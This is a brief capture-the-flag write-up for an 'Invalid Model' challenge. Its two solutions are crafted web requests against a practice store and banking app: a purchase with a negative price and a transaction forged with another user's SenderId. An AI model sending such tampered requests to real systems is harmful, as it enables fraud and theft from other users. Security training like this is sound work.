# Invalid Model

## Challenge

### #1: Buy product for another price

Buy a product from the store for another price that is listed.

### Solution

Create a custom post request on `/api/Store/BuyProduct` with the following body.

```javascript
{
	"id": 1,
	"quantity": 1,
	"price": -10
}
```

You will find the flag in the response header.

### #2: Create a transaction for another user

Create a transaction for another user.

### Solution

Create a post request to `Transaction/Create` with the following body. Don't forget about the RequestVerification token and cookie in your request.

```
SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:
```

You can find the flag in the response cookie.